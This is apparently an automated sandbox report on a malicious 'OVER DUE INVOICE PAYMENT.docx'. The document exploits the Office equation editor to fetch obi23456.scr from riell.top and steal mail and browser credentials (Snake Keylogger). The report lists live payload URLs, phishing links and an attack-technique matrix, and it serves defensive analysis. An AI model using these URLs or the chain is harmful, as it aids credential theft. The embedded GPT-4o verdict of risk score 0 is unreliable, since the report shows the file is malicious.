            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts33
            Exploitation for Client Execution            		Boot or Logon Initialization Scripts111
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory13
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Obfuscated Files or Information            		Security Account Manager1
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Software Packing            		NTDS1
            Query Registry            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp            		LSA Secrets1
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion            		Proc Filesystem1
            Remote System Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
            Process Injection            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467922 Sample: OVER DUE INVOICE PAYMENT.docx Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 36 riell.top 2->36 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 18 other signatures 2->60 9 WINWORD.EXE 303 48 2->9         started        signatures3 process4 dnsIp5 44 riell.top 188.114.96.3, 443, 49161, 49164 CLOUDFLARENETUS European Union 9->44 46 188.114.97.3, 443, 49162, 49163 CLOUDFLARENETUS European Union 9->46 26 C:\Users\user\AppData\...\riell.top.url, MS 9->26 dropped 28 C:\Users\user\AppData\Roaming\...\obb.doc.url, MS 9->28 dropped 30 ~WRF{ACEFE1B1-39FF...8-3592D29053CF}.tmp, Composite 9->30 dropped 74 Microsoft Office launches external ms-search protocol handler (WebDAV) 9->74 76 Office viewer loads remote template 9->76 78 Microsoft Office drops suspicious files 9->78 14 EQNEDT32.EXE 11 9->14         started        file6 signatures7 process8 dnsIp9 48 riell.top 14->48 32 C:\Users\user\AppData\Roaming\obi23456.scr, PE32 14->32 dropped 34 C:\Users\user\AppData\Local\...\obb[1].scr, PE32 14->34 dropped 50 Office equation editor establishes network connection 14->50 52 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->52 19 obi23456.scr 2 14->19         started        file10 signatures11 process12 signatures13 62 Multi AV Scanner detection for dropped file 19->62 64 Machine Learning detection for dropped file 19->64 66 Injects a PE file into a foreign processes 19->66 22 obi23456.scr 12 2 19->22         started        process14 dnsIp15 38 reallyfreegeoip.org 22->38 40 checkip.dyndns.org 22->40 42 4 other IPs or domains 22->42 68 Tries to steal Mail credentials (via file / registry access) 22->68 70 Tries to harvest and steal browser information (history, passwords, etc) 22->70 signatures16 72 Tries to detect the country of the analysis system (by using the IP) 38->72

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            OVER DUE INVOICE PAYMENT.docx34%ReversingLabsDocument-Word.Trojan.Snakekeylogger
            OVER DUE INVOICE PAYMENT.docx26%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp100%AviraEXP/CVE-2018-0798.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\obi23456.scr100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr58%ReversingLabsWin32.Trojan.SnakeStealer
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr51%VirustotalBrowse
            C:\Users\user\AppData\Roaming\obi23456.scr58%ReversingLabsWin32.Trojan.SnakeStealer
            C:\Users\user\AppData\Roaming\obi23456.scr51%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            reallyfreegeoip.org0%VirustotalBrowse
            riell.top5%VirustotalBrowse
            checkip.dyndns.com0%VirustotalBrowse
            checkip.dyndns.org1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            https://riell.top/obb.scri0%Avira URL Cloudsafe
            https://riell.top/obb.scrj0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
            https://riell.top/obb.scr7%VirustotalBrowse
            https://riell.top/obb.scr100%Avira URL Cloudmalware
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/8.46.123.3340%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
            https://riell.top/obb.doc0%Avira URL Cloudsafe
            https://riell.top/obb.scrhhC:0%Avira URL Cloudsafe
            http://reallyfreegeoip.org0%Avira URL Cloudsafe
            https://riell.top/0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
            https://reallyfreegeoip.org0%Avira URL Cloudsafe
            https://riell.top/obb.scrMC:0%Avira URL Cloudsafe
            http://reallyfreegeoip.org0%VirustotalBrowse
            https://riell.top/obb.doc7%VirustotalBrowse
            https://riell.top/4%VirustotalBrowse
            https://reallyfreegeoip.org0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            		188.114.96.3
            		truetrueunknown
            riell.top
            		188.114.96.3
            		truetrueunknown
            checkip.dyndns.com
            		193.122.130.0
            		truefalseunknown
            checkip.dyndns.org
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://riell.top/obb.scrtrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            https://reallyfreegeoip.org/xml/8.46.123.33false
            • Avira URL Cloud: safe
            		unknown
            http://checkip.dyndns.org/false
            • URL Reputation: safe
            		unknown
            https://riell.top/obb.doctrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://ocsp.entrust.net03EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://riell.top/obb.scriEQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            https://riell.top/obb.scrjEQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://checkip.dyndns.orgobi23456.scr, 0000000A.00000002.897811172.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002497000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://reallyfreegeoip.org/xml/8.46.123.334obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://riell.top/obb.scrhhC:EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            http://checkip.dyndns.org/qobi23456.scr, 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://reallyfreegeoip.orgobi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000240E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://riell.top/EQNEDT32.EXE, 00000008.00000003.373161386.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, riell.top.url.0.drtrue
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://reallyfreegeoip.orgobi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://checkip.dyndns.comobi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002497000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://riell.top/obb.scrMC:EQNEDT32.EXE, 00000008.00000003.373161386.000000000059F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.000000000059F000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            http://ocsp.entrust.net0DEQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameobi23456.scr, 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://reallyfreegeoip.org/xml/obi23456.scr, 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            132.226.8.169
            		unknownUnited States
            		16989UTMEMUSfalse
            188.114.97.3
            		unknownEuropean Union
            		13335CLOUDFLARENETUStrue
            193.122.6.168
            		unknownUnited States
            		31898ORACLE-BMC-31898USfalse
            188.114.96.3
            		reallyfreegeoip.orgEuropean Union
            		13335CLOUDFLARENETUStrue
            193.122.130.0
            		checkip.dyndns.comUnited States
            		31898ORACLE-BMC-31898USfalse
            132.226.247.73
            		unknownUnited States
            		16989UTMEMUSfalse

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1467922
            Start date and time:2024-07-05 02:56:55 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 50s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:14
            Number of new started drivers analysed:1
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:OVER DUE INVOICE PAYMENT.docx
            Detection:MAL
            Classification:mal100.troj.spyw.expl.evad.winDOCX@6/19@38/6
            EGA Information:
            • Successful, ratio: 66.7%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 43
            • Number of non-executed functions: 41
            Cookbook Comments:
            • Found application associated with file extension: .docx
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            • Override analysis time to 79573.7050993572 for current running targets taking high CPU consumption
            • Override analysis time to 159147.410198714 for current running targets taking high CPU consumption

            Warnings

            • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
            • Execution Graph export aborted for target EQNEDT32.EXE, PID 3320 because there are no executed function
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            20:57:55API Interceptor51x Sleep call for process: EQNEDT32.EXE modified
            20:57:57API Interceptor9969484x Sleep call for process: obi23456.scr modified

            LLM Input / Output

            InputOutput
            URL: Office document Model: gpt-4o
            ```json{  "riskscore": 0,  "reasons": "The provided screenshot does not contain any visually prominent buttons or links. The text in the screenshot appears to be a list of items with quantities and does not create a sense of urgency or interest. There is no indication of impersonation of well-known brands, and there is no connection between any sense of urgency and a prominent button or link. Therefore, the document does not exhibit characteristics typically associated with phishing or malicious intent."}

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            132.226.8.169j6OUc3S2uP.exeGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/
            lista de cotizaciones.xlam.exeGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/
            Details.exeGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/
            scan copy.exeGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/
            LETTER OF AUTHORIZATION.exeGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/
            Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/
            Find-DscResource_QoS.ps1Get hashmaliciousUnknownBrowse
            • checkip.dyndns.org/
            MT STENA IMPRESSION Vessel Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/
            LAQ-PO088PDF.batGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
            • checkip.dyndns.org/
            188.114.97.3http://cacahs.fdavm.com/Get hashmaliciousUnknownBrowse
            • cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=cpanelwhmreferral
            am.exeGet hashmaliciousAmadeyBrowse
            • downloaddining2.com/h9fmdW6/index.php
            ScanPDF_102.exeGet hashmaliciousFormBookBrowse
            • www.jjjw.xyz/ypml/
            tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
            • www.txglobedev.com/dy13/?IR=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI&nL=S4247TXPfxsLR
            new order.exeGet hashmaliciousFormBookBrowse
            • www.coinwab.com/efdt/
            http://sp.26skins.com/steamstore/category/action_run_jump/?snr=1_1530_4__12Get hashmaliciousUnknownBrowse
            • sp.26skins.com/favicon.ico
            BL Draft.exeGet hashmaliciousFormBookBrowse
            • www.gazeta-ufaley.ru/wjr5/
            Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
            • www.pu6wac.buzz/g2ww/
            Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
            • filetransfer.io/data-package/OWlnEE9J/download
            Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
            • filetransfer.io/data-package/OWlnEE9J/download

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            reallyfreegeoip.orgCR693029829.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.97.3
            Contract.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.97.3
            RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.96.3
            file.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.97.3
            7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.96.3
            j6OUc3S2uP.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.96.3
            7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.96.3
            1mXbuDDPbF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
            • 188.114.97.3
            k8TljgjfDl.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.97.3
            checkip.dyndns.comCR693029829.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.130.0
            Contract.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.130.0
            RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.130.0
            file.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.247.73
            7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.247.73
            j6OUc3S2uP.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.8.169
            7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.247.73
            1mXbuDDPbF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
            • 193.122.130.0
            k8TljgjfDl.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.247.73
            riell.topswift_copy.docx.docGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            swift_copy.docx.docGet hashmaliciousUnknownBrowse
            • 188.114.97.3

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ORACLE-BMC-31898USCR693029829.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.130.0
            Contract.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.130.0
            RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.130.0
            1mXbuDDPbF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
            • 193.122.130.0
            IMG_0178520003023PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
            • 158.101.44.242
            payment.exeGet hashmaliciousSnake KeyloggerBrowse
            • 158.101.44.242
            FiddlerSetup.5.0.20243.10853-latest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
            • 192.29.11.142
            https://ssl.sonicsecuremail.com/r.aspx?b=8&e=pamela%2Ecase%40marionfl%2Eorg&p=4VEU&cb=181Get hashmaliciousUnknownBrowse
            • 192.29.14.118
            PETUNJUK-PENGISIAN DAN PENGIRIMAN KONFIRMASI EDITED.xlsx.scr.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.6.168
            CLOUDFLARENETUShttps://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AW0S.sdscondo.com/index.xml%23?email=cGV0ZXIuYnJvd24yM0Bxci5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
            • 104.17.2.184
            Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            https://rb.gy/zsqpjaGet hashmaliciousHTMLPhisherBrowse
            • 104.17.2.184
            https://singingfiles.com/show.php?l=0&u=2156442&id=64574Get hashmaliciousUnknownBrowse
            • 188.114.97.3
            http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
            • 188.114.97.3
            http://services.business-manange.com/Get hashmaliciousHTMLPhisherBrowse
            • 172.67.138.117
            http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.htmlGet hashmaliciousHTMLPhisherBrowse
            • 104.18.2.35
            http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
            • 104.26.8.44
            http://www.anuihafw369.xyz/m/register/Get hashmaliciousUnknownBrowse
            • 104.17.24.14
            https://pub-1b634168cd404e2d8bece63d5ebb4798.r2.dev/uint.html?schweissdoorsGet hashmaliciousHTMLPhisherBrowse
            • 104.18.2.35
            UTMEMUSfile.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.247.73
            7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.247.73
            j6OUc3S2uP.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.8.169
            7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.247.73
            k8TljgjfDl.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.247.73
            project plan.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.247.73
            MT_01452_03607PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
            • 132.226.247.73
            lista de cotizaciones.xlam.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.8.169
            Details.exeGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.8.169
